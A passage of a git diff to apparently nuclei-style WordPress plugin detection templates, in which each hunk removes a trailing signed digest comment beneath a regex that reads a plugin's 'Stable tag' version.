4b0a00483046022100d510567cbb34b273bbaff62d328ca7f42e83a3259011511f8127089b1dab6763022100b39a22e78bcb5a20ee2c0e3769ad6dc31b142a93c58d77faa0419b5e3b1b8802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index fda1c44436..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203152f467ef2a7658fb42727041ff99b0c7e95e857148f91c4cb4c82bf99bc48e022100aaa582119c4bee694a00c56f00772cdba8ea7c433184a80b78aaf0a0e10248f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 14316bca01..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220327dc0aaaeae271bffd253e3da4b412a1a6c44393ba3a2e9503acdb48114caf802206852c0370c3dbcc5286656fda0112e1296f154867e1e71e4f4e756ebb9c4d34e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index f89f118387..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022007e31f84a24d991dc8cd347ed1516c807ace20daa3d0fa4baf3a28e3d66ed2e702210097bffc445465ed12f14a865286f9fd8e538103f6db056133129d622ab9c17f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index c49c224c93..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203994240eb56d7cf81a37c2d9d1aa3fe1d456cbb2b9327570335782223777e101022100fef26ed276ee9cc5c5b27be79aa3ba924d0e44a02e66c8d298cab5a7d70aa1fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 081ae7ed09..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202b8634e1cf50ef0f6cfbbd8e977deb73d24e3d49f91e0daf5100d1fac585d61e02207fab46726256e6e104a11ddc1c7531dc99726c21ed1a5d2f935068dd363bd733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index b5d69743c0..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a9dd1cae02f11cc00b9190684fb5a6597606d4914b19f2859373a4bcb46a24c0220306bcb06cd2c5df3a1ce04d0ceb270ed16a76d68a3b387a4e5d6e349bae27339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 80681191ea..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b11b37029d3cb7faf7b9fbba735fb5ed16daa7c341c02d59e0f01297d6d8f3a1022100e51ddd28bda244e5f676eb56e1aea59d29a3061cb051ddec6c58c9c1956a2aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 191717e883..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035e2e9315fcb73e11e158b1f6d4fb971a0978f8f4377236677756b4248ca9c7302207152cca378fb1e99b2ea2b36613ff5059bb9fcbcc0e9d254fb9aaa4f0ab34819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 3f2ba4b7ac..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f246dbf0a8b17bc7d8ce5d1e8f479b9a55677f7e689ca097dcfd95d39966b90022100a5f4dfabc78c1e1e87403bda94d35be92d435bbd5417695531a355b384899970:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index c888b9a8fc..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c1f1001f9239c6f2a845068aa978c505ed12d979673c6ade580c9876a0d372da022100ccac4bc0605bbb229dbfffbd18025973640112ef91979a5136ebdfbbef033f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index eb3c4c4416..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024fd7a91b247e636f28b95a2ef94b5bfa4983148b404741a5d0659bff9ce141002205e36b865c160825fad5429bd21cf2837157be59723735909736f4c5936ad016a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index c3209a289d..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100befda96cd90b00ac57e465b710153bd7a7146639937e91bfdc32733d2c648977022100a4df02ed8ceef6cbc32f3d37dec9c2555731e940da9b54e553dddfc021ff0a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index b3b81ce80b..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0337dbc570e0a3c09bb42283a7d5603a0e6f41e0687eeb4a7e1c8b2d01c3eec02207827accbfe06c35a9188739248fa9741c03db234257ddbede252b7cd01cda493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index afc24fc1a1..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a430ac93d8462ac88f2bc890fadabd15d24da0d39650b55328224a2c8a4b05db0221008a1577e2f334d3390ed0bc93465347539befa5c97a3bde3bf96542c808ed7c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 56a85ea29b..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220576a77f271e6c77bf1a0f7dcae313e7ac0150c7863130dfa48e7187edbe8e8de0221008c8f5416e5c11d4a66448031c8e021048d6e7c7b4ffd6855449543c4ad763869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 2154722e77..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204245e3537ae65ffe439141391ac98db5588c21ae6ca1b3f283ec62d9966c2a4302207c118c3448a28fdc5bcbf9e32eb3f2097fcd3d47da527eaf6c8b5da4b75aea12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index f714f42e9b..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100edd00e872b4fd8b23455c0c836c757467f25d0b19ee92efe5aee2c60dbc23c3102202990fa8985e2d5e31ae71632fc79b4a72c84b1fa449e15eea70a3771a07a0c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index ba37203404..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f5275ab01d7d99708da7743dac51f1e13291d73dbfbcf39002d6f83d78ca04c0221009de4840ffc27da8560af6241ea2cee0979569eaa4bd11877a19291b99055671f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 4fec1f83c4..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002cac0ae3b26547fa4912df6fb8aeb94b80752c1e8a34ed9b824edb4db3d1f5a0221008548bf5bdde96b643d74a6c58225d81dec20c54bf145643ffe908ade0f166ac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 510c32a0c3..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d11710fd3e2c4c1b743b29b23076d1e83f35bd475b94265ab1223b4bf10193a40220704b8094566b195c2de575a86a7628975710bfe856d20435aaf92b4aedb43e63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 3ed4f952b8..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f854e6f3ba078790f0dc217e18fcd028548d4a89024a4431d0bcbd4fcb8908b022100a324f66b72687b4eb1da9e8acfaf953838e9deed063bcf8a9acdb12a8d760f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index a25837a19d..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093d45f50b6cca30dae204dbcf56b679a3ec6a38e688e2507578a0cf7c135de0002205e357863f87edb024bf7dffa76a18f5b54333550399673e2e78f4807ca072261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 541afc2460..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dcdf336d1b305fb8c09a81eee2018e6ce9abe6731eebac2083dca770ad2e3b1d02202efdfdecab30f4d6cbafc544a6c039f799ce9bd34635a4d9e8e860b8ef8714ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index a02dea0f42..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1bc6842ba41bb70a11a67855c815f06ccee45a16c9088c1c082ac35e8cc74020221009b9e9d426c3e0008569b67480a26c87e2bcd39b37c37af5c2ec63b8151354bd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a60bf1c497..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e3a723ba73a585330f82123d1a041a5117dc851ad9fd051a382e2fd541a957202210089dc70be0a9595db26aa0098d4b3ceeea947caf6bb21b4903e6bdecea566d580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 7b1d8eb6f9..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ac07658d02b16275333b444c7308876ad54017ed816d3741eb4f2d4026e73b902200aafaf336f396c7e72f823fe2a45531aeb43ca2e0ad1e7bd4f8ecf97858d4035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index c0a9d68f6f..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ac77842d61c0372ba90f39c176a8f620f1ec9aba55326c31987f58cc26dc3c1022100d319be8b20344803c23e5f30a7d660f337054df081ffe88aa222be144913b2af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 829875d5da..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dea42135dc0cef329688b846379d12f2c4d49f7706ff9e1763b80a53871fe4ba022100ca66c318baafc329fda13daa868d63babc928f616171ee238d4a2b1a3002ca58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index e653706864..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201adacfdcd4e33746b16e53f964046217c2094a46717d643d5c187982aed659f2022100ea5930c2c9780ec86819b99e4ee670b84e4e64457ba89c97a5efa66714f5bd99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index debcc26735..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100de1656484a9f956636a1d1eb96713311e6780a4d4e5ed0a81ab4196b4900dfb902205c40454a370b0cfc82b8575fb3493ff941d5f6cc0d714941f9fbccf1ea964504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 8cdd46dbe1..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202694e5658c35a1fb77f7ae1af7ab0f5a8d1b896e1744ed2f8ed04e25efc4a347022100ff187d29134fc2a8c930c8aed9d233f38826f1fdf572f88feb4325670fbd0401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f7a3719413..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202418e3926c9e835f78a6be769ca46e3ce6ab318ab7eb8763b80240808d6b157e02201f09b7617a07a0e4adf4fc9ddd248471b8375afe7cc7b3d7e488c441f57bcb53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ce11d6d2b..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202218ba32a3ccb00d2094c20ef76df9f1d164b87069c54cd82d34c0a63ff032df022100c3ce79e8fb3b0a510512abfe7a882e634feac7d2ab7611cafb2b967f6be8aaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 6c5c85ec48..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100898a4dd5b85370b112e9e86fc1dcceac61588af1249b1a4fdedc0c0b278b3c3d02201322a4d0a7e007bf612fae02cafd82301002d27c8237c74498cf4602a9314a72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index ef5b33d83e..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071dd3a4523bb11b37a7ebe2ea8adc4f531d657ea9c5f267eb52fc78bee9979f002203e28dff596a550d803b6c3a08b6665fe462fe22b73e49fdbc3cc3916f4cb7606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 89cf373fc2..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b392a3ae25fc57ea403fbf537ed920c5be31e399faa81a164ed2e126c7fe2f7b022100bfe644fd86f7ec722359dfec65e202d4ef5b62495956378f6d118972c4360d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c16a900308..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024529c8e5fce8822d5d8d7f85617c9ec10532e9e4acb3be09fb7488cf95fdf6b022045c9f23d440beaf2561709d87775a5359aec944a622b000da8401224f73105b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index dc58900d9e..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf82a138c333f90eef4947f89950bafc59d3b9d8660f831e21808518cd58b30902210091080c1a4b481e4670385ff4961146afd90e89d9f4b4a34cf4da5c20be58dc94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 542ccd0e3b..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f783b069aebd749943fdd17b1c09b3b1f6aec0f02af35d129b83a64745984ee022051cc821a5ac78c9ec796b117c46eacfd34536b1b46c0df20fc3272e5e6205458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index cde93efa9d..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb160d839a58d460f5274481f2016a13bcccbd49d7d9bfddfdbfb5e392c63194022100864a76ceb118b069e17a9e2fd46a31f9a9ab5b1e3bbfebee25baf27ffddaac84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 6e32a4581b..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e52d527dd798bd5041964c2831668f2bc7b1f7ae6224ccf322799bdf024e0b7022014be409a402c85abbce8efe6d7418cdbe289d042ef38682ac0745a66e91a1b5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index cd14406c3e..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d784064e16bbb54cb1cb1068058c22865d4e2d75628f47f632ed445c1955f1600220455fa638c442fc99730f693a288f43479c9ab267623827fce22459fe02c3bc78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index c0ac7da6f9..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b50a25250c6ce3bb12c50b1fd4a649f9f6c116fefcb3ce9f792855ad07e31dfb02203fc553648fd43e2649dc4b57457ba792d869ae086756018aa0e01719a9b2c409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 62cfe1c613..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f6e9d51561e354f27e4971f90f8ce8fd3c82a5675f6399a6a17cfc1c6ed6ccf022100eee717e948708f924d53de65f5764e267aa546abe6da6dcbce082a71ca4238b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 842da10f34..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059bb7426d1f554faa9eb60f936b40b0622c44a20979038f80bfff3e5c00453530220218244ebd3915d7b9879ad1c5ca0b2576df3b1eb87d7c5ea4012ed3fb1a2bb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 6c361c6b1a..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012584d80ba20be4fe1ce12af2e095fa3d72af2c89c212199effa8bad42416004022045ab5e82b5857c6f194258de4fb6bc900e267abb08c857857f3846719838cc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 31a4cb9ceb..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 